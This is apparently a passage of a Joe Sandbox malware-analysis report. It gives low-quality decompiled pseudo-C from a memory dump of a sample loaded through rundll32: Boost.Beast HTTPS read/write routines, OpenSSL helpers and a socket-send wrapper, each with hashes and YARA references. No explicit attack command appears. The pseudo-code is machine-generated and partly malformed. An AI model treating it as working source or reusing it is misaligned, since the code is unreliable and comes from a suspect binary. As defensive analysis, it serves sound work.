				 *0x21EF31B1C20 = "unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<char>>(class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> > &,class boost::beast::basic_flat_buffer<class std::allocator<char> > &,struct boost::beast::http::message<0,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > > &)";
				 *0x21EF31B1C28 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/read.ipp";
				 *0x21EF31B1C30 = 0x30d;
				E0000021E21EF3003690(_t41, _t77 + 0x88);
				E0000021E21EF2FFDFB0(_t53, _t77 - 0x70, 0xf31b1bc8, _t75);
				_t44 = E0000021E21EF31103EC(_t53, _t77 - 0x70, 0xf31e4e68, _t75);
				asm("inc ecx");
				return _t44;
			}










                                        0x21ef2ffa220
                                        0x21ef2ffa224
                                        0x21ef2ffa22b
                                        0x21ef2ffa232
                                        0x21ef2ffa23a
                                        0x21ef2ffa23e
                                        0x21ef2ffa242
                                        0x21ef2ffa246
                                        0x21ef2ffa24a
                                        0x21ef2ffa24e
                                        0x21ef2ffa254
                                        0x21ef2ffa257
                                        0x21ef2ffa25a
                                        0x21ef2ffa25f
                                        0x21ef2ffa264
                                        0x21ef2ffa277
                                        0x21ef2ffa281
                                        0x21ef2ffa287
                                        0x21ef2ffa293
                                        0x21ef2ffa29a
                                        0x21ef2ffa29f
                                        0x21ef2ffa2ab
                                        0x21ef2ffa2b0
                                        0x21ef2ffa2bf
                                        0x21ef2ffa2cc
                                        0x21ef2ffa2d8
                                        0x21ef2ffa2dd
                                        0x21ef2ffa2e2
                                        0x21ef2ffa2e7
                                        0x21ef2ffa2eb
                                        0x21ef2ffa2f3
                                        0x21ef2ffa2f8
                                        0x21ef2ffa306
                                        0x21ef2ffa313
                                        0x21ef2ffa31e
                                        0x21ef2ffa322
                                        0x21ef2ffa333
                                        0x21ef2ffa340
                                        0x21ef2ffa350
                                        0x21ef2ffa36e
                                        0x21ef2ffa377

                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/read.ipp, xrefs: 0000021EF2FFA317
                                        • unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_stri, xrefs: 0000021EF2FFA30C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception$FileHeaderInit_thread_footerRaiseThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/read.ipp$unsigned __int64 __cdecl boost::beast::http::read<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,class boost::beast::basic_flat_buffer<class std::allocator<char> >,false,struct boost::beast::http::basic_stri
                                        • API String ID: 4076867389-3379936717
                                        • Opcode ID: e5d03cb0b8856392f49a17fa8538f7ec0b1675ce6ee4384ff50d5c351f911d08
                                        • Instruction ID: d86aed01c401f21ec592cc28c0ee9ca674035e4e138a79a5465ea42e2f3343a6
                                        • Opcode Fuzzy Hash: e5d03cb0b8856392f49a17fa8538f7ec0b1675ce6ee4384ff50d5c351f911d08
                                        • Instruction Fuzzy Hash: B9316D32214B8096EB10DF64E8842DE77B8F7A4794F524226EF9C53BA8DF38C596C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FFA0E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 26%
                                        			E0000021E21EF2FFA0E0(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi) {
				void* _t39;
				long long _t46;
				void* _t71;
				long long _t73;
				void* _t75;
				long long _t76;
				void* _t77;

				_t73 = __rsi;
				_t46 = _t76;
				_t75 = _t46 - 0x108;
				_t77 = _t76 - 0x200;
				 *((long long*)(_t75 - 0x78)) = 0xfffffffe;
				 *((long long*)(_t46 + 8)) = __rbx;
				 *((long long*)(_t46 + 0x10)) = __rsi;
				 *((long long*)(_t46 + 0x18)) = __rdi;
				_t52 = __rdx;
				_t71 = __rcx;
				 *((intOrPtr*)(_t77 + 0x20)) = 0;
				E0000021E21EF310D880(__rcx, __rdx);
				 *((long long*)(_t77 + 0x28)) = _t46;
				0xf2ffec90();
				if ( *((intOrPtr*)(_t77 + 0x20)) == 0) goto 0xf2ffa205;
				 *((long long*)(_t77 + 0x40)) = 0xf319d200;
				 *((long long*)(_t77 + 0x48)) = 0xf319d200;
				 *((long long*)(_t77 + 0x50)) = 0xf319d200;
				 *((long long*)(_t77 + 0x30)) = 0xf31b1da2;
				 *((char*)(_t77 + 0x38)) = 1;
				E0000021E21EF310E0E4(__rdx, _t77 + 0x30, _t77 + 0x48, _t71, __rsi);
				 *((long long*)(_t77 + 0x40)) = 0xf319d2a0;
				 *((long long*)(_t77 + 0x40)) = 0xf31b1bc8;
				asm("movups xmm0, [esp+0x20]");
				asm("movups [esp+0x58], xmm0");
				 *((long long*)(_t77 + 0x78)) = _t73;
				 *((long long*)(_t75 - 0x80)) = _t73;
				 *((long long*)(_t75 - 0x80)) = 0xf;
				 *((long long*)(_t77 + 0x78)) = _t73;
				 *((intOrPtr*)(_t77 + 0x68)) = sil;
				_t39 = E0000021E21EF2FFDF30(0xf31b1bc8, __rdx, _t75 + 0x18);
				 *0x21EF31B1C20 = "unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> >>(class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> > &,const struct boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > > &)";
				 *0x21EF31B1C28 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/write.ipp";
				 *0x21EF31B1C30 = 0x323;
				E0000021E21EF3003690(_t39, _t75 + 0x88);
				E0000021E21EF2FFDFB0(_t52, _t75 - 0x70, 0xf31b1bc8, _t73);
				return E0000021E21EF31103EC(_t52, _t75 - 0x70, 0xf31e4e68, _t73);
			}










                                        0x21ef2ffa0e0
                                        0x21ef2ffa0e0
                                        0x21ef2ffa0e4
                                        0x21ef2ffa0eb
                                        0x21ef2ffa0f2
                                        0x21ef2ffa0fa
                                        0x21ef2ffa0fe
                                        0x21ef2ffa102
                                        0x21ef2ffa106
                                        0x21ef2ffa109
                                        0x21ef2ffa10e
                                        0x21ef2ffa112
                                        0x21ef2ffa117
                                        0x21ef2ffa127
                                        0x21ef2ffa130
                                        0x21ef2ffa13d
                                        0x21ef2ffa144
                                        0x21ef2ffa149
                                        0x21ef2ffa155
                                        0x21ef2ffa15a
                                        0x21ef2ffa169
                                        0x21ef2ffa176
                                        0x21ef2ffa182
                                        0x21ef2ffa187
                                        0x21ef2ffa18c
                                        0x21ef2ffa191
                                        0x21ef2ffa196
                                        0x21ef2ffa19a
                                        0x21ef2ffa1a2
                                        0x21ef2ffa1a7
                                        0x21ef2ffa1b5
                                        0x21ef2ffa1c2
                                        0x21ef2ffa1cd
                                        0x21ef2ffa1d1
                                        0x21ef2ffa1e2
                                        0x21ef2ffa1ef
                                        0x21ef2ffa21d

                                        APIs
                                        Strings
                                        • unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<cha, xrefs: 0000021EF2FFA1BB
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/write.ipp, xrefs: 0000021EF2FFA1C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception$FileHeaderInit_thread_footerRaiseThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/write.ipp$unsigned __int64 __cdecl boost::beast::http::write<class boost::asio::ssl::stream<class boost::asio::basic_stream_socket<class boost::asio::ip::tcp> >,true,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<cha
                                        • API String ID: 4076867389-3407313142
                                        • Opcode ID: 390820797747de22af92d93a00ddc41198c1fceb6aa38a6f7fbf486f83de749d
                                        • Instruction ID: 20bb5f6a718b23284637248bd4af299d7e3e06ef357341189f04a93e5f6b308f
                                        • Opcode Fuzzy Hash: 390820797747de22af92d93a00ddc41198c1fceb6aa38a6f7fbf486f83de749d
                                        • Instruction Fuzzy Hash: 0C315E32615B8096EB10DB50E8443CEB7B9F394784F524226EE9C43BA9DF3CC596CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302DA80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertCertificateContextProperty
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_cert_get_fname
                                        • API String ID: 665277682-2690582526
                                        • Opcode ID: 79b2cb2b5d6dc7e9a1b933f7a63a3defb7ecdf2f284955527ea9f3f5d724cd80
                                        • Instruction ID: 3563ec1e7ecde7cc4cbc61836ef008c1dafb345ac290986154bb784712f23c0d
                                        • Opcode Fuzzy Hash: 79b2cb2b5d6dc7e9a1b933f7a63a3defb7ecdf2f284955527ea9f3f5d724cd80
                                        • Instruction Fuzzy Hash: CB21717531060082FF509B21ED197DBA3A1AB65BC4F454022ED0947F95EB6DC617CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF33C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 18%
                                        			E0000021E21EF2FF33C0(void* __eax, void* __ebx, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24, intOrPtr _a32, intOrPtr* _a40) {
				long long _v16;
				intOrPtr _v24;
				long long _v40;
				long long _v48;
				intOrPtr _v56;
				intOrPtr _t23;
				intOrPtr _t30;
				void* _t31;
				long long _t37;

				_t37 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_a32 = r9d;
				__imp__#112();
				_v40 = __rbp;
				r8d = __ebx;
				_v48 = __rbp;
				_t46 = __rdx;
				_t44 = __rcx;
				_v56 = 0;
				_a32 = 0;
				__imp__WSASend();
				_t31 = __eax;
				_t23 = E0000021E21EF310D880(__rcx, __rdx);
				__imp__#111();
				_v16 = _t37;
				_v24 = _t23;
				asm("movups xmm0, [esp+0x40]");
				asm("movups [ebx], xmm0");
				_t30 =  *_a40;
				if (_t30 != 0x40) goto 0xf2ff344c;
				_v24 = 0x2746;
				goto 0xf2ff345c;
				if (_t30 != 0x4d2) goto 0xf2ff346e;
				_v24 = 0x274d;
				E0000021E21EF310D880(_t44, __rdx);
				_v16 = _t37;
				asm("movups xmm0, [esp+0x40]");
				asm("movups [ebx], xmm0");
				if (_t31 == 0) goto 0xf2ff3477;
				goto 0xf2ff3491;
				_v24 = 0;
				E0000021E21EF310D880(_t44, _t46);
				_v16 = _t37;
				asm("movups xmm0, [esp+0x40]");
				asm("movups [ebx], xmm0");
				return _a32;
			}












                                        0x21ef2ff33c0
                                        0x21ef2ff33c0
                                        0x21ef2ff33c5
                                        0x21ef2ff33ca
                                        0x21ef2ff33cf
                                        0x21ef2ff33e4
                                        0x21ef2ff33f1
                                        0x21ef2ff33f6
                                        0x21ef2ff33f9
                                        0x21ef2ff33fe
                                        0x21ef2ff3401
                                        0x21ef2ff3404
                                        0x21ef2ff3408
                                        0x21ef2ff340c
                                        0x21ef2ff3412
                                        0x21ef2ff3414
                                        0x21ef2ff341c
                                        0x21ef2ff3422
                                        0x21ef2ff342f
                                        0x21ef2ff3433
                                        0x21ef2ff3438
                                        0x21ef2ff343b
                                        0x21ef2ff3440
                                        0x21ef2ff3442
                                        0x21ef2ff344a
                                        0x21ef2ff3452
                                        0x21ef2ff3454
                                        0x21ef2ff345c
                                        0x21ef2ff3461
                                        0x21ef2ff3466
                                        0x21ef2ff346b
                                        0x21ef2ff3470
                                        0x21ef2ff3475
                                        0x21ef2ff3477
                                        0x21ef2ff347b
                                        0x21ef2ff3480
                                        0x21ef2ff3485
                                        0x21ef2ff348e
                                        0x21ef2ff34a5

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Init_thread_footerSend
                                        • String ID: M'
                                        • API String ID: 4113865755-2701432540
                                        • Opcode ID: a6bb5aa9432d96d1bfa01b45ed6e4aac2997189b46e14d0127da5340bd9af3fd
                                        • Instruction ID: 8096668e2da2657e0d195773d76d0f993abbd22615b35f892f7a965e4e0c2af4
                                        • Opcode Fuzzy Hash: a6bb5aa9432d96d1bfa01b45ed6e4aac2997189b46e14d0127da5340bd9af3fd
                                        • Instruction Fuzzy Hash: 16216072908B8087EB118F24F94429AB7B0F799B84F254219EFC907F59DF3CD4918B44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302A45F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55registrywindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$InformationObjectSourceUser$AddressDeregisterErrorHandleLastMessageModuleProcProcessRegisterReportStationWindow_invalid_parameter_noinfowcsstr
                                        • String ID: OpenSSL
                                        • API String ID: 1804357490-773864679
                                        • Opcode ID: 86ec71efb7cfdb46ea702f6dd2606ec8eb9623775bbf656fafa1927dea9f0af4
                                        • Instruction ID: b6c7e2e90a220ec52bcce2257f7c396187e196bace9308f9bf14e317ddd5141d
                                        • Opcode Fuzzy Hash: 86ec71efb7cfdb46ea702f6dd2606ec8eb9623775bbf656fafa1927dea9f0af4
                                        • Instruction Fuzzy Hash: BB115C32204A808AEB309F20FC583DB73A4FB98798F45552AAE4907F59DF3CC296C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302A46B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54registrywindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$InformationObjectSourceUser$AddressDeregisterErrorHandleLastMessageModuleProcProcessRegisterReportStationWindow_invalid_parameter_noinfowcsstr
                                        • String ID: OpenSSL
                                        • API String ID: 1804357490-773864679
                                        • Opcode ID: 26c6716afbaf5caacc0329c87e0c4a82709509a95590302a30f5eef5bf49bed6
                                        • Instruction ID: 808c64cd0b619250ef1872cd7db7c0089118740ec5f1f2f3b6372f189754511d
                                        • Opcode Fuzzy Hash: 26c6716afbaf5caacc0329c87e0c4a82709509a95590302a30f5eef5bf49bed6
                                        • Instruction Fuzzy Hash: C6113A72204A908AEB209F24FC593DB33A4FB98798F45552AAE4947F59DF3DC296C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3127604 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: abort
                                        • String ID: MessageBoxA$MessageBoxW$SystemFunction036
                                        • API String ID: 4206212132-4003445312
                                        • Opcode ID: 22431766f3e9a50f9fdd398c7b9f585b24de9f0e21ebaef1e5bb0c69857cb8c8
                                        • Instruction ID: faca64fef5b7556de6690738ec764fadddc7ac1e1dc110b2d967e2d7548cc469
                                        • Opcode Fuzzy Hash: 22431766f3e9a50f9fdd398c7b9f585b24de9f0e21ebaef1e5bb0c69857cb8c8
                                        • Instruction Fuzzy Hash: F1116A30200B4581FE159FA5AD583DB63B0E76A751F864022AD1D03BA5EE7CC64FD300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301C523 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: CoSetProxyBlanket$ole32.dll
                                        • API String ID: 1646373207-1829017490
                                        • Opcode ID: ab3a54a3bf3aca8defbc1a656ff67811e1a416d1a790af5c09cc7e4d7e90e107
                                        • Instruction ID: 04d06f07462694dfcca1488a5d1cc301aa6080e7ca7468a769cdccf7f69a8cd5
                                        • Opcode Fuzzy Hash: ab3a54a3bf3aca8defbc1a656ff67811e1a416d1a790af5c09cc7e4d7e90e107
                                        • Instruction Fuzzy Hash: 49018032205A4085EF62DF15EC5879A73A0FBA8B98F5645228E0E47E64DF3CC18AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30330F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 41%
                                        			E0000021E21EF30330F6(void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __rsi, void* __rbp, void* __r8, intOrPtr _a32, void* _a64, void* _a80, void* _a88) {
				long _t9;
				void* _t23;
				char* _t28;

				_t32 = __rbp;
				_t30 = __rsi;
				_t27 = __rdx;
				_t26 = __rcx;
				_t24 = __rbx;
				if (fflush(??) != 0xffffffff) goto 0xf3033157;
				_t9 = GetLastError();
				_a32 = 0x140;
				r8d = _t9;
				_t2 = _t27 - 0x10; // 0x2
				E0000021E21EF30222D0(_t2, 0x12, fflush(??) - 0xffffffff, _t23, __rbx, __rcx, __rdx, __rsi, __rbp, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
				_t28 = "fflush()";
				E0000021E21EF3021640(__ebx, _t23, _t28, __r8, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
				_a32 = 0x142;
				r8d = 2;
				_t4 = _t28 - 0x54; // 0x20
				E0000021E21EF30222D0(_t4, 0x74, fflush(??) - 0xffffffff, _t23, _t24, _t26, _t28, _t30, _t32, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
				return 0;
			}






                                        0x21ef30330f6
                                        0x21ef30330f6
                                        0x21ef30330f6
                                        0x21ef30330f6
                                        0x21ef30330f6
                                        0x21ef30330fe
                                        0x21ef3033100
                                        0x21ef303310b
                                        0x21ef3033113
                                        0x21ef303311d
                                        0x21ef3033120
                                        0x21ef3033125
                                        0x21ef303312e
                                        0x21ef3033133
                                        0x21ef303313b
                                        0x21ef303314d
                                        0x21ef3033150
                                        0x21ef303316e

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastfflush
                                        • String ID: ..\..\openssl-1.1.0f\crypto\bio\bss_file.c$fflush()
                                        • API String ID: 1518747402-499447299
                                        • Opcode ID: bc3521dacd8d2c7673284ac5e40c186babd71deab1d338da691f8a2604399af7
                                        • Instruction ID: 7e1aee03073d65f9c7721bfab164b45f9bd0d2488086f7ee040885ee78cbad5b
                                        • Opcode Fuzzy Hash: bc3521dacd8d2c7673284ac5e40c186babd71deab1d338da691f8a2604399af7
                                        • Instruction Fuzzy Hash: 63F06D3230054082EB609F65EC492CBB760F364794F420226EE4983FE6DB7DC64ACB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30193A0 Relevance: 6.2, APIs: 4, Instructions: 211COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 63%
                                        			E0000021E21EF30193A0(signed int __ebx, signed int __esi, void* __eflags, intOrPtr* __rcx, intOrPtr* __rdx, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* _t116;
				signed int _t117;
				void* _t135;
				void* _t137;
				intOrPtr* _t155;
				void* _t187;
				long long _t188;
				intOrPtr* _t199;
				long long* _t209;
				void* _t220;
				long long* _t221;
				void* _t223;
				void* _t225;
				intOrPtr _t226;
				void* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				void* _t234;
				long long _t237;
				void* _t239;
				long long _t240;
				void* _t242;
				intOrPtr* _t243;
				void* _t245;
				intOrPtr* _t246;

				_t117 = __ebx;
				_t239 = _t231;
				 *(_t239 + 0x20) = r9d;
				 *((long long*)(_t239 + 8)) = __rcx;
				_t232 = _t231 - 0x40;
				 *((long long*)(_t239 - 0x58)) = 0xfffffffe;
				_t246 = __rdx;
				_t243 = __rcx;
				r12d = 0;
				 *(_t239 + 0x20) = r12d;
				 *((long long*)(__rcx)) = 0xf31b6ea8;
				_t229 = __rcx + 0x10;
				 *_t229 = 0xf31b6dc8;
				 *((long long*)(__rcx + 0x98)) = 0xf31b6dd8;
				 *(_t239 + 0x20) = 1;
				 *((long long*)( *((intOrPtr*)( *__rcx + 4)) + __rcx)) = 0xf31b6ea0;
				 *((intOrPtr*)( *((intOrPtr*)( *__rcx + 4)) + __rcx - 4)) =  *((intOrPtr*)( *__rcx + 4)) - 0x18;
				 *((long long*)(__rcx + 8)) = _t240;
				_t155 =  *__rcx;
				_t225 =  *((intOrPtr*)(_t155 + 4)) + __rcx;
				 *((long long*)(_t225 + 0x40)) = _t240;
				 *((long long*)(_t225 + 8)) = _t240;
				 *(_t225 + 0x14) = r12d;
				 *((intOrPtr*)(_t225 + 0x18)) = 0x201;
				 *((long long*)(_t225 + 0x20)) = 6;
				 *((long long*)(_t225 + 0x28)) = _t240;
				 *((long long*)(_t225 + 0x30)) = _t240;
				 *((long long*)(_t225 + 0x38)) = _t240;
				r8d = 0;
				E0000021E21EF3018890(0, __eflags, _t225);
				E0000021E21EF310B674(_t155, _t225);
				_t188 = _t155;
				E0000021E21EF310A500(1, _t188, _t225, _t234);
				 *((long long*)(_t188 + 8)) = _t155;
				 *((long long*)(_t225 + 0x40)) = _t188;
				_t221 = _t243 + 0x18;
				 *((long long*)(_t225 + 0x48)) = _t221;
				 *((long long*)(_t225 + 0x50)) = _t240;
				E0000021E21EF3018948(_t225, _t232 + 0x28);
				E0000021E21EF3018F94(_t155, _t155);
				_t199 =  *((intOrPtr*)(_t232 + 0x30));
				if (_t199 == 0) goto 0xf30194c5;
				 *((intOrPtr*)( *_t199 + 0x10))(_t245, _t242, _t240, _t220, _t223, _t228, _t187);
				if (_t155 == 0) goto 0xf30194c5;
				 *((intOrPtr*)( *_t155))();
				 *((char*)(_t225 + 0x58)) =  *((intOrPtr*)( *_t155 + 0x40))();
				if ( *((intOrPtr*)(_t225 + 0x48)) != _t240) goto 0xf30194eb;
				r8d = 0;
				E0000021E21EF3018890( *(_t225 + 0x10) | 0x00000004,  *((intOrPtr*)(_t225 + 0x48)) - _t240, _t225);
				 *((long long*)(_t232 + 0x88)) = _t229;
				 *((long long*)( *((intOrPtr*)( *_t229 + 4)) + _t229)) = 0xf31b6eb8;
				 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4)) + _t229 - 4)) =  *((intOrPtr*)( *_t229 + 4)) - 0x10;
				 *((long long*)( *((intOrPtr*)( *_t243 + 4)) + _t243)) = 0xf31b6de8;
				 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 4)) + _t243 - 4)) =  *((intOrPtr*)( *_t243 + 4)) - 0x20;
				 *((long long*)( *((intOrPtr*)( *_t243 + 4)) + _t243)) = 0xf31b6e90;
				 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 4)) + _t243 - 4)) =  *((intOrPtr*)( *_t243 + 4)) - 0x98;
				 *((long long*)(_t232 + 0x88)) = _t221;
				 *_t221 = 0xf31b6d08;
				E0000021E21EF310B674(0xf31b6d08,  *((intOrPtr*)( *_t243 + 4)));
				E0000021E21EF310A500(1, 0xf31b6d08, _t225,  *_t155);
				 *0x21EF31B6D10 = 0xf31b6d08;
				 *((long long*)(_t221 + 0x60)) = 0xf31b6d08;
				 *((long long*)(_t221 + 0x18)) = _t221 + 8;
				_t209 = _t221 + 0x10;
				 *((long long*)(_t221 + 0x20)) = _t209;
				 *((long long*)(_t221 + 0x38)) = _t221 + 0x28;
				 *((long long*)(_t221 + 0x40)) = _t221 + 0x30;
				 *(_t221 + 0x50) = _t221 + 0x48;
				 *(_t221 + 0x58) = _t221 + 0x4c;
				 *_t209 = _t240;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x40)))) = _t240;
				 *( *(_t221 + 0x58)) = r12d;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = _t240;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = _t240;
				 *( *(_t221 + 0x50)) = r12d;
				 *_t221 = 0xf31b6df8;
				_t226 =  *((intOrPtr*)(_t246 + 0x10));
				if ( *((long long*)(_t246 + 0x18)) - 0x10 < 0) goto 0xf30195f6;
				 *((long long*)(_t221 + 0x68)) = _t240;
				 *(_t221 + 0x70) = r12d;
				if (_t226 == 0) goto 0xf3019696;
				r8b = 1;
				E0000021E21EF2FE5C20(_t226,  *_t199);
				_t116 = E0000021E21EF310DC90(1, _t135, __esi, _t137, 0xf31b6df8,  *_t246, _t221, _t226, _t226);
				_t237 = 0xf31b6df8 + _t226;
				 *((long long*)(_t221 + 0x68)) = _t237;
				if (( *(_t221 + 0x70) & 0x00000004) != 0) goto 0xf301964a;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = 0xf31b6df8;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = 0xf31b6df8;
				 *( *(_t221 + 0x50)) = __esi;
				if (( *(_t221 + 0x70) & 0x00000002) != 0) goto 0xf3019692;
				_t219 =  !=  ? _t237 : 0xf31b6df8;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x20)))) = 0xf31b6df8;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x40)))) =  !=  ? _t237 : 0xf31b6df8;
				 *( *(_t221 + 0x58)) = _t117 - 1 + __esi;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t221 + 0x38)))) != _t240) goto 0xf3019692;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = 0xf31b6df8;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = _t240;
				 *( *(_t221 + 0x50)) = _t117;
				 *(_t221 + 0x70) =  *(_t221 + 0x70) | 0x00000001;
				return _t116;
			}
































                                        0x21ef30193a0
                                        0x21ef30193a0
                                        0x21ef30193a3
                                        0x21ef30193a7
                                        0x21ef30193b5
                                        0x21ef30193b9
                                        0x21ef30193c1
                                        0x21ef30193c4
                                        0x21ef30193c7
                                        0x21ef30193ca
                                        0x21ef30193d5
                                        0x21ef30193d8
                                        0x21ef30193e3
                                        0x21ef30193ee
                                        0x21ef30193f5
                                        0x21ef301940b
                                        0x21ef3019419
                                        0x21ef301941e
                                        0x21ef3019422
                                        0x21ef3019429
                                        0x21ef301942c
